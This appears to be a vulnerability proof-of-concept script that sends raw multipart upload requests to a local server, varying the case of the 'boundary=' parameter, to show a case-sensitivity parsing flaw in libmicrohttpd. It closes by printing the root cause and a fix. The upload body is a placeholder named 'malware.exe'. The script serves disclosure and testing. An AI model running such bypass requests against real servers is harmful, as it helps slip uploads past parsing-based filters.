#!/usr/bin/env python3
import socket
import time

TARGET = "127.0.0.1"
PORT   = 8888

BODY = (
    b"--BOUNDARY123\r\n"
    b"Content-Disposition: form-data; name=\"secret_file\"; filename=\"malware.exe\"\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"MALICIOUS_PAYLOAD_DATA\r\n"
    b"--BOUNDARY123--\r\n"
)

def send_raw(label, content_type_header):
    request = (
        f"POST /upload HTTP/1.1\r\n"
        f"Host: {TARGET}:{PORT}\r\n"
        f"Content-Type: {content_type_header}\r\n"
        f"Content-Length: {len(BODY)}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    ).encode() + BODY

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET, PORT))
    s.sendall(request)
    time.sleep(0.2)
    resp = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        resp += chunk
    s.close()

    status_line = resp.split(b"\r\n")[0].decode()
    print(f"  [{label}]")
    print(f"    Content-Type: {content_type_header}")
    print(f"    Server response: {status_line}")
    print()

print("=" * 60)
print("libmicrohttpd boundary= case-sensitivity bypass PoC")
print("RFC 2046 §4.1 violation in postprocessor.c:82")
print("=" * 60)
print()

print("--- NORMAL REQUEST (boundary= lowercase) ---")
send_raw("boundary=", "multipart/form-data; boundary=BOUNDARY123")
time.sleep(0.3)

print("--- ATTACK REQUEST 1 (Boundary= capitalized) ---")
send_raw("Boundary=", "multipart/form-data; Boundary=BOUNDARY123")
time.sleep(0.3)

print("--- ATTACK REQUEST 2 (BOUNDARY= all caps) ---")
send_raw("BOUNDARY=", "multipart/form-data; BOUNDARY=BOUNDARY123")
time.sleep(0.3)

print("ROOT CAUSE: postprocessor.c:82  strstr(boundary, \"boundary=\")")
print("Developer TODO: /* Q: should this be strcasestr? */")
print("Fix: case-insensitive search per RFC 2046 §4.1")